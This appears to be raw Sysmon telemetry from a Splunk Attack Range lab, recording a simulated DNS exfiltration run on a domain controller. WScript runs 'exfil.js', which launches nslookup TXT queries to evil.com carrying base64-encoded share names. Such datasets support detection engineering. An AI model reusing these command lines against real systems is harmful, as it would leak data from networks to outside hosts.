Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB884AC83D3547293E5EA3AF8F825BD6,SHA256=A69AFB05F0F4EE6B920862628E93BD37DE0361640C4A379985EF7D563C95F0BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000043944Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:33.810{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52326-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000202159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.998{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-2941-000000005F02}7412C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.998{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-2941-000000005F02}7412C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.982{2E1864BB-17C5-629A-2941-000000005F02}74125740C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-2841-000000005F02}7484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.982{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-2941-000000005F02}7412C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.982{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.982{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.966{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.966{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.966{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-2841-000000005F02}7484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.966{2E1864BB-17A1-629A-783D-000000005F02}55526092C:\Windows\System32\WScript.exe{2E1864BB-17C5-629A-2841-000000005F02}7484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.981{2E1864BB-17C5-629A-2841-000000005F02}7484C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nligds.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.966{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nluzmzx.tmpMD5=72212EBDCB2E8E793A1B2134D4FA7DE3,SHA256=B332410D88A2D1B397F1BE63E741050D785B52E6644B4C66DB2FEDBE9A959973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.951{2E1864BB-17C5-629A-2641-000000005F02}22367824C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-2741-000000005F02}8160C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.951{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.951{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.951{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.951{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.951{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-2741-000000005F02}8160C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.951{2E1864BB-17C5-629A-2541-000000005F02}19601188C:\Windows\system32\cmd.exe{2E1864BB-17C5-629A-2741-000000005F02}8160C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.957{2E1864BB-17C5-629A-2741-000000005F02}8160C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C5-629A-2541-000000005F02}1960C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluzmzx.tmp 2>&1 10341000x8000000000000000202139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.935{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-2641-000000005F02}2236C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.935{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-2641-000000005F02}2236C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.935{2E1864BB-17C5-629A-2641-000000005F02}22367824C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-2541-000000005F02}1960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.932{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-2641-000000005F02}2236C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.913{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.913{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.913{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.913{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.913{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-2541-000000005F02}1960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.913{2E1864BB-17A1-629A-783D-000000005F02}55527072C:\Windows\System32\WScript.exe{2E1864BB-17C5-629A-2541-000000005F02}1960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.926{2E1864BB-17C5-629A-2541-000000005F02}1960C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluzmzx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 